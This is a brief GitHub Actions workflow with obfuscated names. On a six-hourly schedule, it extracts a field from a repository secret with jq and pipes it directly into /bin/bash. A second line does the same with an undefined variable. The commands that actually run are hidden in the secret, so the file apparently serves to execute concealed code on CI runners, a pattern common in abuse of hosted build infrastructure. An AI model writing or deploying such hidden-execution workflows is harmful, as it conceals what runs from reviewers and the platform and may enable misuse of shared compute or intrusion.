name: maturehometeam
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maturehometeam
        env:
          usm5: ${{ secrets.usm5 }}
        run: |
          echo $usm5 | jq -r .di9 | /bin/bash
          echo $i62343 | jq -r .a8 | /bin/bash

